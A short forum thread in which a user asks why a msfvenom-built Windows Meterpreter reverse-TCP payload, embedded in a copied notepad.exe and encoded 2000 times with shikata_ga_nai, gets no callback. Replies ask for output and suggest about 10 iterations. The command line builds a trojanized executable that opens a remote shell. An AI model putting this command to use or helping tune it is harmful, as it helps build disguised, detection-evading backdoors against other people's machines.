I have copied notepad.exe form my Windows machine to Kali to use as a template and did this command msfvenom -p windows/meterpreter/reversetcp LHOST= LPORT=4444 -x notepad.exe -e x86/shikataganai -i 2000 -f exe > evil.exe When I transfer the evil.exe to my computer and run it I don't get a response from the file. I do have a handler running with said payload.
Anyhelp would be great, think I built this command wrong.
3 Responses
Could you possibly provide screenshots of the output from msfvenom?
Iterations here
Also the typos weren't in the command I was running. I just typed it from looking at my SSH session so I didn't mean to do that.
Try with 10 itinerations xd .2000 is just too much
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